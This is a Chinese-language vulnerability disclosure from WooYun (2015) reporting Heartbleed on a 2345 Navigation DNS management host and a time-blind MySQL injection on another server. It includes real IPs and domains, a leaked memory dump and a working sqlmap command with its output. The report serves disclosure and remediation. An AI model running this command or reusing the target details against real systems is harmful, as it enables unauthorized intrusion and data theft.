2345导航DNS运维站点OpenSSL心脏滴血和另一站点MySQL注射

编号94182
Urlhttp://www.wooyun.org/bug.php?action=view&id=94182
漏洞状态厂商已经确认
漏洞标题2345导航DNS运维站点OpenSSL心脏滴血和另一站点MySQL注射
漏洞类型系统/服务补丁不及时
厂商2345网址导航
白帽子lijiejie
提交日期2015-01-27 16:12:00
公开日期2015-03-13 16:14:00
修复时间(not set)
确认时间2015-01-28 00:00:00
Confirm Spend1
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank10
厂商评级
厂商评rank5
漏洞简介
2345导航DNS运维平台OpenSSL心脏滴血,另一站点存在MySQL注射
漏洞细节

OpenSSL Heart Bleeding漏洞:

183.136.203.191	191dns.ruichuang.net


2345的内部系统使用域名ruichuang.net。
SQL注射位于:

POST http://183.136.203.105/help/detail.php
act=feedback&id=1*&val=2


参数id可注入,time blind。 该站点实际是jifen.2345.com。但线上的站点注射已经修复了。

POC

OpenSSL Heart Bleeding:

Gecko) Chrome/38.0.2125.24 Safari/537.36..Referer: https://191dns.ruichuang.net/
recordList.php?searchtype=&keyword=203.10&record_type=A&room=&isbeijl=&sousuan=%
A1%A1%CB%D1%CB%F7%A1%A1&domain=2345.com..Accept-Encoding: gzip,deflate..Accept-L
[email protected][...r....+..H...9..w.3....f.....".!.9.8...5.....3.2.....E.D...../...A...
I.....4.2...#.Request..Referer: https://191dns.ruichuang.net/recordList.php?sear
chtype=&keyword=203.10&record_type=A&room=&isbeijl=&sousuan=%A1%A1%CB%D1%CB%F7%A
1%A1&domain=2345.com..Host: 191dns.ruichuang.net..Connection: Keep-alive..Accept
-Encoding: gzip,deflate..Accept: */*.....M.N..>..f...N...R}4ns:xsd="http://www.w
3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xm
lns:m0="http://tempuri.org/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/en
coding/" xmlns:urn="http://umbraco.org/webservices/"> <SOAP-ENV:Header/>
<SOAP-ENV:Body> <urn:update> <urn:carrier> <urn:Id
>1048</urn:Id> <urn:MastertemplateId>1047</urn:MastertemplateId>
<urn:MasterPageFile>test</urn:MasterPageFile> <urn:Name>tes
t</urn:Name> <urn:Alias>test</urn:Alias> <urn:Design>tes
t</urn:Design> </urn:carrier> <urn:username>test</urn:userna
me> <urn:password>test</urn:password> </urn:update> </SOAP-
ENV:Body></SOAP-ENV:Envelope>.][email protected]@[email protected]>.:.;.<...
[.2...K.L.M.N.O.P.Q.R.S.]...l...i.w.|.\.....e.f.g.....x...4.5.6.


SQL注射:

sqlmap.py -u "http://183.136.203.105/help/detail.php" --data="act=feedback&id=1*&val=2"  --dbms=MySQL --current-user
current user: '[email protected]%'
current database: 'my_2345'

修复方案

升级OpenSSL
过滤参数

状态信息 2015-01-27: 细节已通知厂商并且等待厂商处理中
2015-01-28: 厂商已经确认,细节仅向厂商公开
2015-02-07: 细节向核心白帽子及相关领域专家公开
2015-02-17: 细节向普通白帽子公开
2015-02-27: 细节向实习白帽子公开
2015-03-13: 细节向公众公开
厂商回复感谢您对2345的关注,问题会尽快修复
回应信息危害等级:低漏洞Rank:5 确认时间:2015-01-28 11:36
Showing 1-1 of 1 item.
评论内容评论人点赞数评论时间

2345导航, lijiejie已经注意你很久了

动后河02015-01-27 16:45:00